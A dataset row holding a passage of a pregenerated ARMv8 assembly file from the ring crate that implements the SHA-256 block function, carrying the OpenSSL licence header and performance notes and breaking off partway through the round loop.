repo_id stringlengths 5 115 | size int64 590 5.01M | file_path stringlengths 4 212 | content stringlengths 590 5.01M |
|---|---|---|---|
mi2bjss/Pressel-site | 34,239 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/ring-0.17.13/pregenerated/sha256-armv8-linux64.S | // This file is generated from a similarly-named Perl script in the BoringSSL
// source tree. Do not edit by hand.
#include <ring-core/asm_base.h>
#if !defined(OPENSSL_NO_ASM) && defined(OPENSSL_AARCH64) && defined(__ELF__)
// Copyright 2014-2020 The OpenSSL Project Authors. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// https://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// ====================================================================
// Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
// project.
// ====================================================================
//
// SHA256/512 for ARMv8.
//
// Performance in cycles per processed byte and improvement coefficient
// over code generated with "default" compiler:
//
// SHA256-hw SHA256(*) SHA512
// Apple A7 1.97 10.5 (+33%) 6.73 (-1%(**))
// Cortex-A53 2.38 15.5 (+115%) 10.0 (+150%(***))
// Cortex-A57 2.31 11.6 (+86%) 7.51 (+260%(***))
// Denver 2.01 10.5 (+26%) 6.70 (+8%)
// X-Gene 20.0 (+100%) 12.8 (+300%(***))
// Mongoose 2.36 13.0 (+50%) 8.36 (+33%)
// Kryo 1.92 17.4 (+30%) 11.2 (+8%)
//
// (*) Software SHA256 results are of lesser relevance, presented
// mostly for informational purposes.
// (**) The result is a trade-off: it's possible to improve it by
// 10% (or by 1 cycle per round), but at the cost of 20% loss
// on Cortex-A53 (or by 4 cycles per round).
// (***) Super-impressive coefficients over gcc-generated code are
// indication of some compiler "pathology", most notably code
// generated with -mgeneral-regs-only is significantly faster
// and the gap is only 40-90%.
#ifndef __KERNEL__
#endif
.text
.globl sha256_block_data_order_nohw
.hidden sha256_block_data_order_nohw
.type sha256_block_data_order_nohw,%function
.align 6
sha256_block_data_order_nohw:
AARCH64_SIGN_LINK_REGISTER
stp x29,x30,[sp,#-128]!
add x29,sp,#0
stp x19,x20,[sp,#16]
stp x21,x22,[sp,#32]
stp x23,x24,[sp,#48]
stp x25,x26,[sp,#64]
stp x27,x28,[sp,#80]
sub sp,sp,#4*4
ldp w20,w21,[x0] // load context
ldp w22,w23,[x0,#2*4]
ldp w24,w25,[x0,#4*4]
add x2,x1,x2,lsl#6 // end of input
ldp w26,w27,[x0,#6*4]
adrp x30,.LK256
add x30,x30,:lo12:.LK256
stp x0,x2,[x29,#96]
.Loop:
ldp w3,w4,[x1],#2*4
ldr w19,[x30],#4 // *K++
eor w28,w21,w22 // magic seed
str x1,[x29,#112]
#ifndef __AARCH64EB__
rev w3,w3 // 0
#endif
ror w16,w24,#6
add w27,w27,w19 // h+=K[i]
eor w6,w24,w24,ror#14
and w17,w25,w24
bic w19,w26,w24
add w27,w27,w3 // h+=X[i]
orr w17,w17,w19 // Ch(e,f,g)
eor w19,w20,w21 // a^b, b^c in next round
eor w16,w16,w6,ror#11 // Sigma1(e)
ror w6,w20,#2
add w27,w27,w17 // h+=Ch(e,f,g)
eor w17,w20,w20,ror#9
add w27,w27,w16 // h+=Sigma1(e)
and w28,w28,w19 // (b^c)&=(a^b)
add w23,w23,w27 // d+=h
eor w28,w28,w21 // Maj(a,b,c)
eor w17,w6,w17,ror#13 // Sigma0(a)
add w27,w27,w28 // h+=Maj(a,b,c)
ldr w28,[x30],#4 // *K++, w19 in next round
//add w27,w27,w17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev w4,w4 // 1
#endif
ldp w5,w6,[x1],#2*4
add w27,w27,w17 // h+=Sigma0(a)
ror w16,w23,#6
add w26,w26,w28 // h+=K[i]
eor w7,w23,w23,ror#14
and w17,w24,w23
bic w28,w25,w23
add w26,w26,w4 // h+=X[i]
orr w17,w17,w28 // Ch(e,f,g)
eor w28,w27,w20 // a^b, b^c in next round
eor w16,w16,w7,ror#11 // Sigma1(e)
ror w7,w27,#2
add w26,w26,w17 // h+=Ch(e,f,g)
eor w17,w27,w27,ror#9
add w26,w26,w16 // h+=Sigma1(e)
and w19,w19,w28 // (b^c)&=(a^b)
add w22,w22,w26 // d+=h
eor w19,w19,w20 // Maj(a,b,c)
eor w17,w7,w17,ror#13 // Sigma0(a)
add w26,w26,w19 // h+=Maj(a,b,c)
ldr w19,[x30],#4 // *K++, w28 in next round
//add w26,w26,w17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev w5,w5 // 2
#endif
add w26,w26,w17 // h+=Sigma0(a)
ror w16,w22,#6
add w25,w25,w19 // h+=K[i]
eor w8,w22,w22,ror#14
and w17,w23,w22
bic w19,w24,w22
add w25,w25,w5 // h+=X[i]
orr w17,w17,w19 // Ch(e,f,g)
eor w19,w26,w27 // a^b, b^c in next round
eor w16,w16,w8,ror#11 // Sigma1(e)
ror w8,w26,#2
add w25,w25,w17 // h+=Ch(e,f,g)
eor w17,w26,w26,ror#9
add w25,w25,w16 // h+=Sigma1(e)
and w28,w28,w19 // (b^c)&=(a^b)
add w21,w21,w25 // d+=h
eor w28,w28,w27 // Maj(a,b,c)
eor w17,w8,w17,ror#13 // Sigma0(a)
add w25,w25,w28 // h+=Maj(a,b,c)
ldr w28,[x30],#4 // *K++, w19 in next round
//add w25,w25,w17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev w6,w6 // 3
#endif
ldp w7,w8,[x1],#2*4
add w25,w25,w17 // h+=Sigma0(a)
ror w16,w21,#6
add w24,w24,w28 // h+=K[i]
eor w9,w21,w21,ror#14
and w17,w22,w21
bic w28,w23,w21
add w24,w24,w6 // h+=X[i]
orr w17,w17,w28 // Ch(e,f,g)
eor w28,w25,w26 // a^b, b^c in next round
eor w16,w16,w9,ror#11 // Sigma1(e)
ror w9,w25,#2
add w24,w24,w17 // h+=Ch(e,f,g)
eor w17,w25,w25,ror#9
add w24,w24,w16 // h+=Sigma1(e)
and w19,w19,w28 // (b^c)&=(a^b)
add w20,w20,w24 // d+=h
eor w19,w19,w26 // Maj(a,b,c)
eor w17,w9,w17,ror#13 // Sigma0(a)
add w24,w24,w19 // h+=Maj(a,b,c)
ldr w19,[x30],#4 // *K++, w28 in next round
//add w24,w24,w17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev w7,w7 // 4
#endif
add w24,w24,w17 // h+=Sigma0(a)
ror w16,w20,#6
add w23,w23,w19 // h+=K[i]
eor w10,w20,w20,ror#14
and w17,w21,w20
bic w19,w22,w20
add w23,w23,w7 // h+=X[i]
orr w17,w17,w19 // Ch(e,f,g)
eor w19,w24,w25 // a^b, b^c in next round
eor w16,w16,w10,ror#11 // Sigma1(e)
ror w10,w24,#2
add w23,w23,w17 // h+=Ch(e,f,g)
eor w17,w24,w24,ror#9
add w23,w23,w16 // h+=Sigma1(e)
and w28,w28,w19 // (b^c)&=(a^b)
add w27,w27,w23 // d+=h
eor w28,w28,w25 // Maj(a,b,c)
eor w17,w10,w17,ror#13 // Sigma0(a)
add w23,w23,w28 // h+=Maj(a,b,c)
ldr w28,[x30],#4 // *K++, w19 in next round
//add w23,w23,w17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev w8,w8 // 5
#endif
ldp w9,w10,[x1],#2*4
add w23,w23,w17 // h+=Sigma0(a)
ror w16,w27,#6
add w22,w22,w28 // h+=K[i]
eor w11,w27,w27,ror#14
and w17,w20,w27
bic w28,w21,w27
add w22,w22,w8 // h+=X[i]
orr w17,w17,w28 // Ch(e,f,g)
eor w28,w23,w24 // a^b, b^c in next round
eor w16,w16,w11,ror#11 // Sigma1(e)
ror w11,w23,#2
add w22,w22,w17 // h+=Ch(e,f,g)
eor w17,w23,w23,ror#9
add w22,w22,w16 // h+=Sigma1(e)
and w19,w19,w28 // (b^c)&=(a^b)
add w26,w26,w22 // d+=h
eor w19,w19,w24 // Maj(a,b,c)
eor w17,w11,w17,ror#13 // Sigma0(a)
add w22,w22,w19 // h+=Maj(a,b,c)
ldr w19,[x30],#4 // *K++, w28 in next round
//add w22,w22,w17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev w9,w9 // 6
#endif
add w22,w22,w17 // h+=Sigma0(a)
ror w16,w26,#6
add w21,w21,w19 // h+=K[i]
eor w12,w26,w26,ror#14
and w17,w27,w26
bic w19,w20,w26
add w21,w21,w9 // h+=X[i]
orr w17,w17,w19 // Ch(e,f,g)
eor w19,w22,w23 // a^b, b^c in next round
eor w16,w16,w12,ror#11 // Sigma1(e)
ror w12,w22,#2
add w21,w21,w17 // h+=Ch(e,f,g)
eor w17,w22,w22,ror#9
add w21,w21,w16 // h+=Sigma1(e)
and w28,w28,w19 // (b^c)&=(a^b)
add w25,w25,w21 // d+=h
eor w28,w28,w23 // Maj(a,b,c)
eor w17,w12,w17,ror#13 // Sigma0(a)
add w21,w21,w28 // h+=Maj(a,b,c)
ldr w28,[x30],#4 // *K++, w19 in next round
//add w21,w21,w17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev w10,w10 // 7
#endif
ldp w11,w12,[x1],#2*4
add w21,w21,w17 // h+=Sigma0(a)
ror w16,w25,#6
add w20,w20,w28 // h+=K[i]
eor w13,w25,w25,ror#14
and w17,w26,w25
bic w28,w27,w25
add w20,w20,w10 // h+=X[i]
orr w17,w17,w28 // Ch(e,f,g)
eor w28,w21,w22 // a^b, b^c in next round
eor w16,w16,w13,ror#11 // Sigma1(e)
ror w13,w21,#2
add w20,w20,w17 // h+=Ch(e,f,g)
eor w17,w21,w21,ror#9
add w20,w20,w16 // h+=Sigma1(e)
and w19,w19,w28 // (b^c)&=(a^b)
add w24,w24,w20 // d+=h
eor w19,w19,w22 // Maj(a,b,c)
eor w17,w13,w17,ror#13 // Sigma0(a)
add w20,w20,w19 // h+=Maj(a,b,c)
ldr w19,[x30],#4 // *K++, w28 in next round
//add w20,w20,w17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev w11,w11 // 8
#endif
add w20,w20,w17 // h+=Sigma0(a)
ror w16,w24,#6
add w27,w27,w19 // h+=K[i]
eor w14,w24,w24,ror#14
and w17,w25,w24
bic w19,w26,w24
add w27,w27,w11 // h+=X[i]
orr w17,w17,w19 // Ch(e,f,g)
eor w19,w20,w21 // a^b, b^c in next round
eor w16,w16,w14,ror#11 // Sigma1(e)
ror w14,w20,#2
add w27,w27,w17 // h+=Ch(e,f,g)
eor w17,w20,w20,ror#9
add w27,w27,w16 // h+=Sigma1(e)
and w28,w28,w19 // (b^c)&=(a^b)
add w23,w23,w27 // d+=h
eor w28,w28,w21 // Maj(a,b,c)
eor w17,w14,w17,ror#13 // Sigma0(a)
add w27,w27,w28 // h+=Maj(a,b,c)
ldr w28,[x30],#4 // *K++, w19 in next round
//add w27,w27,w17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev w12,w12 // 9
#endif
ldp w13,w14,[x1],#2*4
add w27,w27,w17 // h+=Sigma0(a)
ror w16,w23,#6
add w26,w26,w28 // h+=K[i]
eor w15,w23,w23,ror#14
and w17,w24,w23
bic w28,w25,w23
add w26,w26,w12 // h+=X[i]
orr w17,w17,w28 // Ch(e,f,g)
eor w28,w27,w20 // a^b, b^c in next round
eor w16,w16,w15,ror#11 // Sigma1(e)
ror w15,w27,#2
add w26,w26,w17 // h+=Ch(e,f,g)
eor w17,w27,w27,ror#9
add w26,w26,w16 // h+=Sigma1(e)
and w19,w19,w28 // (b^c)&=(a^b)
add w22,w22,w26 // d+=h
eor w19,w19,w20 // Maj(a,b,c)
eor w17,w15,w17,ror#13 // Sigma0(a)
add w26,w26,w19 // h+=Maj(a,b,c)
ldr w19,[x30],#4 // *K++, w28 in next round
//add w26,w26,w17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev w13,w13 // 10
#endif
add w26,w26,w17 // h+=Sigma0(a)
ror w16,w22,#6
add w25,w25,w19 // h+=K[i]
eor w0,w22,w22,ror#14
and w17,w23,w22
bic w19,w24,w22
add w25,w25,w13 // h+=X[i]
orr w17,w17,w19 // Ch(e,f,g)
eor w19,w26,w27 // a^b, b^c in next round
eor w16,w16,w0,ror#11 // Sigma1(e)
ror w0,w26,#2
add w25,w25,w17 // h+=Ch(e,f,g)
eor w17,w26,w26,ror#9
add w25,w25,w16 // h+=Sigma1(e)
and w28,w28,w19 // (b^c)&=(a^b)
add w21,w21,w25 // d+=h
eor w28,w28,w27 // Maj(a,b,c)
eor w17,w0,w17,ror#13 // Sigma0(a)
add w25,w25,w28 // h+=Maj(a,b,c)
ldr w28,[x30],#4 // *K++, w19 in next round
//add w25,w25,w17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev w14,w14 // 11
#endif
ldp w15,w0,[x1],#2*4
add w25,w25,w17 // h+=Sigma0(a)
str w6,[sp,#12]
ror w16,w21,#6
add w24,w24,w28 // h+=K[i]
eor w6,w21,w21,ror#14
and w17,w22,w21
bic w28,w23,w21
add w24,w24,w14 // h+=X[i]
orr w17,w17,w28 // Ch(e,f,g)
eor w28,w25,w26 // a^b, b^c in next round
eor w16,w16,w6,ror#11 // Sigma1(e)
ror w6,w25,#2
add w24,w24,w17 // h+=Ch(e,f,g)
eor w17,w25,w25,ror#9
add w24,w24,w16 // h+=Sigma1(e)
and w19,w19,w28 // (b^c)&=(a^b)
add w20,w20,w24 // d+=h
eor w19,w19,w26 // Maj(a,b,c)
eor w17,w6,w17,ror#13 // Sigma0(a)
add w24,w24,w19 // h+=Maj(a,b,c)
ldr w19,[x30],#4 // *K++, w28 in next round
//add w24,w24,w17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev w15,w15 // 12
#endif
add w24,w24,w17 // h+=Sigma0(a)
str w7,[sp,#0]
ror w16,w20,#6
add w23,w23,w19 // h+=K[i]
eor w7,w20,w20,ror#14
and w17,w21,w20
bic w19,w22,w20
add w23,w23,w15 // h+=X[i]
orr w17,w17,w19 // Ch(e,f,g)
eor w19,w24,w25 // a^b, b^c in next round
eor w16,w16,w7,ror#11 // Sigma1(e)
ror w7,w24,#2
add w23,w23,w17 // h+=Ch(e,f,g)
eor w17,w24,w24,ror#9
add w23,w23,w16 // h+=Sigma1(e)
and w28,w28,w19 // (b^c)&=(a^b)
add w27,w27,w23 // d+=h
eor w28,w28,w25 // Maj(a,b,c)
eor w17,w7,w17,ror#13 // Sigma0(a)
add w23,w23,w28 // h+=Maj(a,b,c)
ldr w28,[x30],#4 // *K++, w19 in next round
//add w23,w23,w17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev w0,w0 // 13
#endif
ldp w1,w2,[x1]
add w23,w23,w17 // h+=Sigma0(a)
str w8,[sp,#4]
ror w16,w27,#6
add w22,w22,w28 // h+=K[i]
eor w8,w27,w27,ror#14
and w17,w20,w27
bic w28,w21,w27
add w22,w22,w0 // h+=X[i]
orr w17,w17,w28 // Ch(e,f,g)
eor w28,w23,w24 // a^b, b^c in next round
eor w16,w16,w8,ror#11 // Sigma1(e)
ror w8,w23,#2
add w22,w22,w17 // h+=Ch(e,f,g)
eor w17,w23,w23,ror#9
add w22,w22,w16 // h+=Sigma1(e)
and w19,w19,w28 // (b^c)&=(a^b)
add w26,w26,w22 // d+=h
eor w19,w19,w24 // Maj(a,b,c)
eor w17,w8,w17,ror#13 // Sigma0(a)
add w22,w22,w19 // h+=Maj(a,b,c)
ldr w19,[x30],#4 // *K++, w28 in next round
//add w22,w22,w17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev w1,w1 // 14
#endif
ldr w6,[sp,#12]
add w22,w22,w17 // h+=Sigma0(a)
str w9,[sp,#8]
ror w16,w26,#6
add w21,w21,w19 // h+=K[i]
eor w9,w26,w26,ror#14
and w17,w27,w26
bic w19,w20,w26
add w21,w21,w1 // h+=X[i]
orr w17,w17,w19 // Ch(e,f,g)
eor w19,w22,w23 // a^b, b^c in next round
eor w16,w16,w9,ror#11 // Sigma1(e)
ror w9,w22,#2
add w21,w21,w17 // h+=Ch(e,f,g)
eor w17,w22,w22,ror#9
add w21,w21,w16 // h+=Sigma1(e)
and w28,w28,w19 // (b^c)&=(a^b)
add w25,w25,w21 // d+=h
eor w28,w28,w23 // Maj(a,b,c)
eor w17,w9,w17,ror#13 // Sigma0(a)
add w21,w21,w28 // h+=Maj(a,b,c)
ldr w28,[x30],#4 // *K++, w19 in next round
//add w21,w21,w17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev w2,w2 // 15
#endif
ldr w7,[sp,#0]
add w21,w21,w17 // h+=Sigma0(a)
str w10,[sp,#12]
ror w16,w25,#6
add w20,w20,w28 // h+=K[i]
ror w9,w4,#7
and w17,w26,w25
ror w8,w1,#17
bic w28,w27,w25
ror w10,w21,#2
add w20,w20,w2 // h+=X[i]
eor w16,w16,w25,ror#11
eor w9,w9,w4,ror#18
orr w17,w17,w28 // Ch(e,f,g)
eor w28,w21,w22 // a^b, b^c in next round
eor w16,w16,w25,ror#25 // Sigma1(e)
eor w10,w10,w21,ror#13
add w20,w20,w17 // h+=Ch(e,f,g)
and w19,w19,w28 // (b^c)&=(a^b)
eor w8,w8,w1,ror#19
eor w9,w9,w4,lsr#3 // sigma0(X[i+1])
add w20,w20,w16 // h+=Sigma1(e)
eor w19,w19,w22 // Maj(a,b,c)
eor w17,w10,w21,ror#22 // Sigma0(a)
eor w8,w8,w1,lsr#10 // sigma1(X[i+14])
add w3,w3,w12
add w24,w24,w20 // d+=h
add w20,w20,w19 // h+=Maj(a,b,c)
ldr w19,[x30],#4 // *K++, w28 in next round
add w3,w3,w9
add w20,w20,w17 // h+=Sigma0(a)
add w3,w3,w8
.Loop_16_xx:
ldr w8,[sp,#4]
str w11,[sp,#0]
ror w16,w24,#6
add w27,w27,w19 // h+=K[i]
ror w10,w5,#7
and w17,w25,w24
ror w9,w2,#17
bic w19,w26,w24
ror w11,w20,#2
add w27,w27,w3 // h+=X[i]
eor w16,w16,w24,ror#11
eor w10,w10,w5,ror#18
orr w17,w17,w19 // Ch(e,f,g)
eor w19,w20,w21 // a^b, b^c in next round
eor w16,w16,w24,ror#25 // Sigma1(e)
eor w11,w11,w20,ror#13
add w27,w27,w17 // h+=Ch(e,f,g)
and w28,w28,w19 // (b^c)&=(a^b)
eor w9,w9,w2,ror#19
eor w10,w10,w5,lsr#3 // sigma0(X[i+1])
add w27,w27,w16 // h+=Sigma1(e)
eor w28,w28,w21 // Maj(a,b,c)
eor w17,w11,w20,ror#22 // Sigma0(a)
eor w9,w9,w2,lsr#10 // sigma1(X[i+14])
add w4,w4,w13
add w23,w23,w27 // d+=h
add w27,w27,w28 // h+=Maj(a,b,c)
ldr w28,[x30],#4 // *K++, w19 in next round
add w4,w4,w10
add w27,w27,w17 // h+=Sigma0(a)
add w4,w4,w9
ldr w9,[sp,#8]
str w12,[sp,#4]
ror w16,w23,#6
add w26,w26,w28 // h+=K[i]
ror w11,w6,#7
and w17,w24,w23
ror w10,w3,#17
bic w28,w25,w23
ror w12,w27,#2
add w26,w26,w4 // h+=X[i]
eor w16,w16,w23,ror#11
eor w11,w11,w6,ror#18
orr w17,w17,w28 // Ch(e,f,g)
eor w28,w27,w20 // a^b, b^c in next round
eor w16,w16,w23,ror#25 // Sigma1(e)
eor w12,w12,w27,ror#13
add w26,w26,w17 // h+=Ch(e,f,g)
and w19,w19,w28 // (b^c)&=(a^b)
eor w10,w10,w3,ror#19
eor w11,w11,w6,lsr#3 // sigma0(X[i+1])
add w26,w26,w16 // h+=Sigma1(e)
eor w19,w19,w20 // Maj(a,b,c)
eor w17,w12,w27,ror#22 // Sigma0(a)
eor w10,w10,w3,lsr#10 // sigma1(X[i+14])
add w5,w5,w14
add w22,w22,w26 // d+=h
add w26,w26,w19 // h+=Maj(a,b,c)
ldr w19,[x30],#4 // *K++, w28 in next round
add w5,w5,w11
add w26,w26,w17 // h+=Sigma0(a)
add w5,w5,w10
ldr w10,[sp,#12]
str w13,[sp,#8]
ror w16,w22,#6
add w25,w25,w19 // h+=K[i]
ror w12,w7,#7
and w17,w23,w22
ror w11,w4,#17
bic w19,w24,w22
ror w13,w26,#2
add w25,w25,w5 // h+=X[i]
eor w16,w16,w22,ror#11
eor w12,w12,w7,ror#18
orr w17,w17,w19 // Ch(e,f,g)
eor w19,w26,w27 // a^b, b^c in next round
eor w16,w16,w22,ror#25 // Sigma1(e)
eor w13,w13,w26,ror#13
add w25,w25,w17 // h+=Ch(e,f,g)
and w28,w28,w19 // (b^c)&=(a^b)
eor w11,w11,w4,ror#19
eor w12,w12,w7,lsr#3 // sigma0(X[i+1])
add w25,w25,w16 // h+=Sigma1(e)
eor w28,w28,w27 // Maj(a,b,c)
eor w17,w13,w26,ror#22 // Sigma0(a)
eor w11,w11,w4,lsr#10 // sigma1(X[i+14])
add w6,w6,w15
add w21,w21,w25 // d+=h
add w25,w25,w28 // h+=Maj(a,b,c)
ldr w28,[x30],#4 // *K++, w19 in next round
add w6,w6,w12
add w25,w25,w17 // h+=Sigma0(a)
add w6,w6,w11
ldr w11,[sp,#0]
str w14,[sp,#12]
ror w16,w21,#6
add w24,w24,w28 // h+=K[i]
ror w13,w8,#7
and w17,w22,w21
ror w12,w5,#17
bic w28,w23,w21
ror w14,w25,#2
add w24,w24,w6 // h+=X[i]
eor w16,w16,w21,ror#11
eor w13,w13,w8,ror#18
orr w17,w17,w28 // Ch(e,f,g)
eor w28,w25,w26 // a^b, b^c in next round
eor w16,w16,w21,ror#25 // Sigma1(e)
eor w14,w14,w25,ror#13
add w24,w24,w17 // h+=Ch(e,f,g)
and w19,w19,w28 // (b^c)&=(a^b)
eor w12,w12,w5,ror#19
eor w13,w13,w8,lsr#3 // sigma0(X[i+1])
add w24,w24,w16 // h+=Sigma1(e)
eor w19,w19,w26 // Maj(a,b,c)
eor w17,w14,w25,ror#22 // Sigma0(a)
eor w12,w12,w5,lsr#10 // sigma1(X[i+14])
add w7,w7,w0
add w20,w20,w24 // d+=h
add w24,w24,w19 // h+=Maj(a,b,c)
ldr w19,[x30],#4 // *K++, w28 in next round
add w7,w7,w13
add w24,w24,w17 // h+=Sigma0(a)
add w7,w7,w12
ldr w12,[sp,#4]
str w15,[sp,#0]
ror w16,w20,#6
add w23,w23,w19 // h+=K[i]
ror w14,w9,#7
and w17,w21,w20
ror w13,w6,#17
bic w19,w22,w20
ror w15,w24,#2
add w23,w23,w7 // h+=X[i]
eor w16,w16,w20,ror#11
eor w14,w14,w9,ror#18
orr w17,w17,w19 // Ch(e,f,g)
eor w19,w24,w25 // a^b, b^c in next round
eor w16,w16,w20,ror#25 // Sigma1(e)
eor w15,w15,w24,ror#13
add w23,w23,w17 // h+=Ch(e,f,g)
and w28,w28,w19 // (b^c)&=(a^b)
eor w13,w13,w6,ror#19
eor w14,w14,w9,lsr#3 // sigma0(X[i+1])
add w23,w23,w16 // h+=Sigma1(e)
eor w28,w28,w25 // Maj(a,b,c)
eor w17,w15,w24,ror#22 // Sigma0(a)
eor w13,w13,w6,lsr#10 // sigma1(X[i+14])
add w8,w8,w1
add w27,w27,w23 // d+=h
add w23,w23,w28 // h+=Maj(a,b,c)
ldr w28,[x30],#4 // *K++, w19 in next round
add w8,w8,w14
add w23,w23,w17 // h+=Sigma0(a)
add w8,w8,w13
ldr w13,[sp,#8]
str w0,[sp,#4]
ror w16,w27,#6
add w22,w22,w28 // h+=K[i]
ror w15,w10,#7
and w17,w20,w27
ror w14,w7,#17
bic w28,w21,w27
ror w0,w23,#2
add w22,w22,w8 // h+=X[i]
eor w16,w16,w27,ror#11
eor w15,w15,w10,ror#18
orr w17,w17,w28 // Ch(e,f,g)
eor w28,w23,w24 // a^b, b^c in next round
eor w16,w16,w27,ror#25 // Sigma1(e)
eor w0,w0,w23,ror#13
add w22,w22,w17 // h+=Ch(e,f,g)
and w19,w19,w28 // (b^c)&=(a^b)
eor w14,w14,w7,ror#19
eor w15,w15,w10,lsr#3 // sigma0(X[i+1])
add w22,w22,w16 // h+=Sigma1(e)
eor w19,w19,w24 // Maj(a,b,c)
eor w17,w0,w23,ror#22 // Sigma0(a)
eor w14,w14,w7,lsr#10 // sigma1(X[i+14])
add w9,w9,w2
add w26,w26,w22 // d+=h
add w22,w22,w19 // h+=Maj(a,b,c)
ldr w19,[x30],#4 // *K++, w28 in next round
add w9,w9,w15
add w22,w22,w17 // h+=Sigma0(a)
add w9,w9,w14
ldr w14,[sp,#12]
str w1,[sp,#8]
ror w16,w26,#6
add w21,w21,w19 // h+=K[i]
ror w0,w11,#7
and w17,w27,w26
ror w15,w8,#17
bic w19,w20,w26
ror w1,w22,#2
add w21,w21,w9 // h+=X[i]
eor w16,w16,w26,ror#11
eor w0,w0,w11,ror#18
orr w17,w17,w19 // Ch(e,f,g)
eor w19,w22,w23 // a^b, b^c in next round
eor w16,w16,w26,ror#25 // Sigma1(e)
eor w1,w1,w22,ror#13
add w21,w21,w17 // h+=Ch(e,f,g)
and w28,w28,w19 // (b^c)&=(a^b)
eor w15,w15,w8,ror#19
eor w0,w0,w11,lsr#3 // sigma0(X[i+1])
add w21,w21,w16 // h+=Sigma1(e)
eor w28,w28,w23 // Maj(a,b,c)
eor w17,w1,w22,ror#22 // Sigma0(a)
eor w15,w15,w8,lsr#10 // sigma1(X[i+14])
add w10,w10,w3
add w25,w25,w21 // d+=h
add w21,w21,w28 // h+=Maj(a,b,c)
ldr w28,[x30],#4 // *K++, w19 in next round
add w10,w10,w0
add w21,w21,w17 // h+=Sigma0(a)
add w10,w10,w15
ldr w15,[sp,#0]
str w2,[sp,#12]
ror w16,w25,#6
add w20,w20,w28 // h+=K[i]
ror w1,w12,#7
and w17,w26,w25
ror w0,w9,#17
bic w28,w27,w25
ror w2,w21,#2
add w20,w20,w10 // h+=X[i]
eor w16,w16,w25,ror#11
eor w1,w1,w12,ror#18
orr w17,w17,w28 // Ch(e,f,g)
eor w28,w21,w22 // a^b, b^c in next round
eor w16,w16,w25,ror#25 // Sigma1(e)
eor w2,w2,w21,ror#13
add w20,w20,w17 // h+=Ch(e,f,g)
and w19,w19,w28 // (b^c)&=(a^b)
eor w0,w0,w9,ror#19
eor w1,w1,w12,lsr#3 // sigma0(X[i+1])
add w20,w20,w16 // h+=Sigma1(e)
eor w19,w19,w22 // Maj(a,b,c)
eor w17,w2,w21,ror#22 // Sigma0(a)
eor w0,w0,w9,lsr#10 // sigma1(X[i+14])
add w11,w11,w4
add w24,w24,w20 // d+=h
add w20,w20,w19 // h+=Maj(a,b,c)
ldr w19,[x30],#4 // *K++, w28 in next round
add w11,w11,w1
add w20,w20,w17 // h+=Sigma0(a)
add w11,w11,w0
ldr w0,[sp,#4]
str w3,[sp,#0]
ror w16,w24,#6
add w27,w27,w19 // h+=K[i]
ror w2,w13,#7
and w17,w25,w24
ror w1,w10,#17
bic w19,w26,w24
ror w3,w20,#2
add w27,w27,w11 // h+=X[i]
eor w16,w16,w24,ror#11
eor w2,w2,w13,ror#18
orr w17,w17,w19 // Ch(e,f,g)
eor w19,w20,w21 // a^b, b^c in next round
eor w16,w16,w24,ror#25 // Sigma1(e)
eor w3,w3,w20,ror#13
add w27,w27,w17 // h+=Ch(e,f,g)
and w28,w28,w19 // (b^c)&=(a^b)
eor w1,w1,w10,ror#19
eor w2,w2,w13,lsr#3 // sigma0(X[i+1])
add w27,w27,w16 // h+=Sigma1(e)
eor w28,w28,w21 // Maj(a,b,c)
eor w17,w3,w20,ror#22 // Sigma0(a)
eor w1,w1,w10,lsr#10 // sigma1(X[i+14])
add w12,w12,w5
add w23,w23,w27 // d+=h
add w27,w27,w28 // h+=Maj(a,b,c)
ldr w28,[x30],#4 // *K++, w19 in next round
add w12,w12,w2
add w27,w27,w17 // h+=Sigma0(a)
add w12,w12,w1
ldr w1,[sp,#8]
str w4,[sp,#4]
ror w16,w23,#6
add w26,w26,w28 // h+=K[i]
ror w3,w14,#7
and w17,w24,w23
ror w2,w11,#17
bic w28,w25,w23
ror w4,w27,#2
add w26,w26,w12 // h+=X[i]
eor w16,w16,w23,ror#11
eor w3,w3,w14,ror#18
orr w17,w17,w28 // Ch(e,f,g)
eor w28,w27,w20 // a^b, b^c in next round
eor w16,w16,w23,ror#25 // Sigma1(e)
eor w4,w4,w27,ror#13
add w26,w26,w17 // h+=Ch(e,f,g)
and w19,w19,w28 // (b^c)&=(a^b)
eor w2,w2,w11,ror#19
eor w3,w3,w14,lsr#3 // sigma0(X[i+1])
add w26,w26,w16 // h+=Sigma1(e)
eor w19,w19,w20 // Maj(a,b,c)
eor w17,w4,w27,ror#22 // Sigma0(a)
eor w2,w2,w11,lsr#10 // sigma1(X[i+14])
add w13,w13,w6
add w22,w22,w26 // d+=h
add w26,w26,w19 // h+=Maj(a,b,c)
ldr w19,[x30],#4 // *K++, w28 in next round
add w13,w13,w3
add w26,w26,w17 // h+=Sigma0(a)
add w13,w13,w2
ldr w2,[sp,#12]
str w5,[sp,#8]
ror w16,w22,#6
add w25,w25,w19 // h+=K[i]
ror w4,w15,#7
and w17,w23,w22
ror w3,w12,#17
bic w19,w24,w22
ror w5,w26,#2
add w25,w25,w13 // h+=X[i]
eor w16,w16,w22,ror#11
eor w4,w4,w15,ror#18
orr w17,w17,w19 // Ch(e,f,g)
eor w19,w26,w27 // a^b, b^c in next round
eor w16,w16,w22,ror#25 // Sigma1(e)
eor w5,w5,w26,ror#13
add w25,w25,w17 // h+=Ch(e,f,g)
and w28,w28,w19 // (b^c)&=(a^b)
eor w3,w3,w12,ror#19
eor w4,w4,w15,lsr#3 // sigma0(X[i+1])
